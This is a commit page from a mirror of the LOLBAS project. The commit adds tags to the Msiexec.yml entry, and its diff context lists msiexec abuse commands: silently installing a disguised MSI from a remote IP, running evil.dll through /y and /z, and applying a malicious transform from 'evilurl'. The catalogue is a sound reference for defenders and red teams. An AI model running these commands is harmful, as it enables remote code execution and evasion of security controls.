public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-11-04 02:29:34 +01:00
Code Issues Projects Releases Wiki Activity

Update Msiexec.yml Tags

Browse Source 
Added Tags:
Execute MSI
Execute Remote 
Input Custom Format
This commit is contained in:
hegusung
2024-10-13 16:12:06 +02:00
committed by GitHub
parent bd07c4dd24
commit 090f8e2078
1 changed files with 14 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
yml/OSBinaries/Msiexec.yml
View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Input: Custom Format
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
@@ -18,6 +21,10 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Execute: Remote
- Input: Custom Format
- Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DllRegisterServer to register the target DLL.
Usecase: Execute dll files
@@ -27,6 +34,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: Remote
- Input: Custom Format
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DllUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
@@ -36,6 +45,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: Remote
- Input: Custom Format
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
@@ -43,6 +54,9 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: Remote
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe